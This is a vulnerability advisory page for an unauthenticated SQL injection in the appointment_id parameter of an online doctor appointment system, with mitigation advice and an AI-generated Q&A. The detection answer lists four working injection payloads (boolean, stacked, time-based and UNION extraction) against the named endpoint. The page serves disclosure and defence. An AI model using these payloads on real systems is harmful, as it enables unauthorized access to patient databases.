CVE-2026-4473
SQL Injection in itsourcecode Online Doctor Appointment System
Publication date: 2026-03-20
Last updated on: 2026-04-29
Assigner: VulDB
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| unguardable | online_doctor_appointment_system | 1.0 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-74 | The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component. |
| CWE-89 | The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data. |
Attack-Flow Graph
AI Powered Q&A
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include implementing secure coding practices and restricting database privileges to reduce the risk of exploitation.
- Use prepared statements with parameter binding to separate SQL code from user input, preventing SQL injection.
- Apply strict input validation and filtering to ensure that inputs conform to expected formats.
- Minimize database user permissions by avoiding the use of high-privilege accounts (such as root or admin) for routine database operations.
- Conduct regular security audits of code and systems to detect and address vulnerabilities promptly.
Can you explain this vulnerability to me?
CVE-2026-4473 is a critical SQL injection vulnerability found in version 1.0 of the Online Doctor Appointment System, specifically in the file /admin/appointment_action.php.
The vulnerability occurs because the appointment_id parameter is improperly handled and directly used in SQL queries without proper input validation or sanitization.
Attackers can inject malicious SQL code through the appointment_id parameter, enabling unauthorized manipulation of database queries.
- Boolean-based blind SQL injection
- Stacked queries
- Time-based blind SQL injection
- UNION-based SQL injection to extract data
The vulnerability can be exploited remotely without authentication or authorization.
How can this vulnerability impact me? :
Exploitation of this vulnerability can lead to unauthorized access to the database, allowing attackers to leak, modify, or delete sensitive data.
It can result in full system compromise and potential disruption of services.
Because the vulnerability requires no authentication, it poses a high risk of exploitation by remote attackers.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
I don't know
How can this vulnerability be detected on my network or system? Can you suggest some commands?
[{'type': 'paragraph', 'content': 'This vulnerability can be detected by testing the `appointment_id` parameter in the `/admin/appointment_action.php` file for SQL injection flaws. Several exploitation techniques can be used to confirm the presence of the vulnerability, including Boolean-based blind SQL injection, stacked queries, time-based blind SQL injection, and UNION-based SQL injection.'}, {'type': 'list_item', 'content': "Boolean-based blind SQL injection payload example: appointment_id=7' AND 6812=6812 AND 'DAQk'='DAQk&action=fetch_single"}, {'type': 'list_item', 'content': "Stacked queries payload example: appointment_id=7';SELECT SLEEP(5) # &action=fetch_single"}, {'type': 'list_item', 'content': "Time-based blind SQL injection payload example: appointment_id=7' AND (SELECT 3624 FROM (SELECT(SLEEP(5)))yCgd) AND 'KHeV'='KHeV&action=fetch_single"}, {'type': 'list_item', 'content': "UNION-based SQL injection payload example: appointment_id=7' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x717a6b6271,0x6f6b677063794e536154414d424e7445736d5769487a53546c50446b4e43617673644270765562,0x71766b7a71),NULL,NULL,NULL,NULL,NULL-- -&action=fetch_single"}, {'type': 'paragraph', 'content': 'Additionally, automated tools like sqlmap can be used to test and confirm the vulnerability by targeting the `appointment_id` parameter.'}] [1]